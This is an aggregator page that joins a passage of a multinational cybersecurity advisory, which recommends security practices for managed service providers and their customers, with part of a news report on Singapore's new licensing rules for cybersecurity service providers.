  • MSPs should recommend the adoption of MFA across all customer services and products. Note: MSPs should also implement MFA on all accounts that have access to customer environments and should treat those accounts as privileged.
  • Customers should ensure that their contractual arrangements mandate the use of MFA on the services and products they receive. Contracts should also require MFA to be enforced on all MSP accounts used to access customer environments.

Manage internal architecture risks and segregate internal networks. 

Organizations should understand their environment and segregate their networks. Identify, group, and isolate critical business systems and apply appropriate network security controls to them to reduce the impact of a compromise across the organization.[12],[13]

  • MSPs should review and verify all connections between internal systems, customer systems, and other networks. Segregate customer data sets (and services, where applicable) from each other—as well as from internal company networks—to limit the impact of a single vector of attack. Do not reuse admin credentials across multiple customers. 
  • Customers should review and verify all connections between internal systems, MSP systems, and other networks. Ensure management of identity providers and trusts between the different environments. Use a dedicated virtual private network (VPN) or alternative secure access method, to connect to MSP infrastructure and limit all network traffic to and from the MSP to that dedicated secure connection. Verify that the networks used for trust relationships with MSPs are suitably segregated from the rest of their networks. Ensure contractual agreements specify that MSPs will not reuse admin credentials across multiple customers.

Apply the principle of least privilege. 

Organizations should apply the principle of least privilege throughout their network environment and immediate update privileges upon changes in administrative roles. Use a tiering model for administrative accounts so that these accounts do not have any unnecessary access or privileges. Only use accounts with full privileges across an enterprise when strictly necessary and consider the use of time-based privileges to further restrict their use. Identify high-risk devices, services and users to minimize their accesses.[14]

  • MSPs should apply this principle to both internal and customer environments, avoiding default administrative privileges. 
  • Customers should ensure that their MSP applies this principle to both provider and customer network environments. Note: customers with contractual arrangements that provide them with administration of MSP accounts within their environment should ensure that the MSP accounts only have access to the services/resources being managed by the MSP.

Deprecate obsolete accounts and infrastructure. 

Both MSPs and customers should periodically review their internet attack surface and take steps to limit it, such as disabling user accounts when personnel transition.[15] (Note: although sharing accounts is not recommended, should an organization require this, passwords to shared account should be reset when personnel transition.) Organizations should also audit their network infrastructure—paying particular attention to those on the MSP-customer boundary—to identify and disable unused systems and services. Port scanning tools and automated system inventories can assist organizations in confirming the roles and responsibilities of systems.

  • Customers should be sure to disable MSP accounts that are no longer managing infrastructure. Note: disabling MSP accounts can be overlooked when a contract terminates.

Apply updates. 

Organizations should update software, including operating systems, applications, and firmware. Prioritize applying security updates to software containing known exploited vulnerabilities. Note: organizations should prioritize patching vulnerabilities included in CISA’s catalogue of known exploited vulnerabilities (KEV) as opposed to only those with high Common Vulnerability Scoring System (CVSS) scores that have not been exploited and may never be exploited.[16],[17],[18],[19]

  • MSPs should implement updates on internal networks as quickly as possible.
  • Customers should ensure that they understand their MSP’s policy on software updates and request that comprehensive and timely updates are delivered as an ongoing service.

Backup systems and data. 

Organizations should regularly update and test backups—including “gold images” of critical systems in the event these need to be rebuilt (Note: organizations should base the frequency of backups on their recovery point objective [20]). Store backups separately and isolate them from network connections that could enable the spread of ransomware; many ransomware variants attempt to find and encrypt/delete accessible backups. Isolating backups enables restoration of systems/data to their previous state should they be encrypted with ransomware. Note: best practices include storing backups separately, such as on external media.[21],[22],[23

  • MSPs should regularly backup internal data as well as customer data (where contractually appropriate) and maintain offline backups encrypted with separate, offline encryption keys. Providers should encourage customers to create secure, offsite backups and exercise recovery capabilities.
  • Customers should ensure that their contractual arrangements include backup services that meet their resilience and disaster recovery requirements. Specifically, customers should require their MSP to implement a backup solution that automatically and continuously backs up critical data and system configurations and store backups in an easily retrievable location, e.g., a cloud-based solution or a location that is air-gapped from the organizational network.

Develop and exercise incident response and recovery plans. 

Incident response and recovery plans should include roles and responsibilities for all organizational stakeholders, including executives, technical leads, and procurement officers. Organizations should maintain up-to-date hard copies of plans to ensure responders can access them should the network be inaccessible (e.g., due to a ransomware attack).[24]

  • MSPs should develop and regularly exercise internal incident response and recovery plans and encourage customers to do the same.
  • Customers should ensure that their contractual arrangements include incident response and recovery plans that meet their resilience and disaster recovery requirements. Customers should ensure these plans are tested at regular intervals.

Understand and proactively manage supply chain risk. 

All organizations should proactively manage ICT supply chain risk across security, legal, and procurement groups, using risk assessments to identify and prioritize the allocation of resources.[25],[26]

  • MSPs should understand their own supply chain risk and manage the cascading risks it poses to customers.
  • Customers should understand the supply chain risk associated with their MSP, including risk associated with third-party vendors or subcontractors. Customers should also set clear network security expectations with their MSPs and understand the access their MSP has to their network and the data it houses. Each customer should ensure their contractual arrangements meet their specific security requirements and that their contract specifies whether the MSP or the customer owns specific responsibilities, such as hardening, detection, and incident response.[27]

Promote transparency. 

Both MSPs and their customers will benefit from contractual arrangements that clearly define responsibilities. 

  • MSPs, when negotiating the terms of a contract with their customer, should provide clear explanations of the services the customer is purchasing, services the customer is not purchasing, and all contingencies for incident response and recovery.
  • Customers should ensure that they have a thorough understanding of the security services their MSP is providing via the contractual arrangement and address any security requirements that fall outside the scope of the contract. Note: contracts should detail how and when MSPs notify the customer of an incident affecting the customer’s environment.

Manage account authentication and authorization. 

All organizations should adhere to best practices for password and permission management. [28],[29],[30] Organizations should review logs for unexplained failed authentication attempts—failed authentication attempts directly following an account password change could indicate that the account had been compromised. Note: network defenders can proactively search for such “intrusion canaries” by reviewing logs after performing password changes—using off-network communications to inform users of the changes—across all sensitive accounts. (See the ACSC publication, Windows Event Logging and Forwarding as well as Microsoft’s documentation, 4625(F): An account failed to log on, for additional guidance.) 

  • MSPs should verify that the customer restricts MSP account access to systems managed by the MSP.
  • Customers should ensure MSP accounts are not assigned to internal administrator groups; instead, restrict MSP accounts to systems managed by the MSP. Grant access and administrative permissions on a need-to-know basis, using the principle of least privilege. Verify, via audits, that MSP accounts are being used for appropriate purposes and activities, and that these accounts are disabled when not actively being used. 

Purpose

This advisory was developed by UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities in furtherance their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

Acknowledgements

The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities would like to thank Secureworks for their contributions to this CSA.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. NCSC-UK, ACSC, CCCS, NCSC-NZ, CISA, NSA, and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favouring.

Source…

Cyber-security service providers must apply for a licence by Oct 11

/in


The agency added that the “risks of services being carried out by incompetent or substandard providers are multifold”. Licensing, thus, seeks to improve standards over time.

Licensing aims to address an information gap faced by customers, especially smaller ones, by helping them to identify credible providers, said CSA.

Telco StarHub, one reseller of cyber-security services that provided feedback on the licensing framework, said that with the “growing importance of cyber security in today’s digital world, we understand the need for a calibrated and effective licensing regime”.

One of the services that require licensing is “penetration testing”, which checks if an organisation can identify and respond to simulated cyber-security attacks.

Another licensable service is for monitoring activities in computer systems to identify threats.

Organisations that offer licensable cyber-security services for free, as well as entities that provide such services to a related company, do not need to be licensed.

The framework also does not cover offerings for non-business consumers, such as anti-virus software.

Providers, either companies or individuals, who offer a licensable service without a licence after the deadline can be fined up to $50,000, jailed for up to two years or both.

But providers who apply for a licence by Oct 11 can continue to offer their services until a decision on their application has been made.

Licensed service providers that fail to meet licensing conditions can have their licence revoked or suspended, and face a fine of up to $10,000 for each infringement, capped at $50,000 in total.

CSA sought public feedback on the licensing framework from September to October last year. Some respondents suggested that licensing be required only for providers that offer services to clients directly, and exclude sub-contractors or resellers.

And for providers that tap related businesses from the same corporate group here or overseas to offer services to the same customer, they asked that just one entity in the group needs to be licensed.

CSA said it understood the concerns over the possible administrative burden. But it added that requiring only one entity to be licensed might…

Source…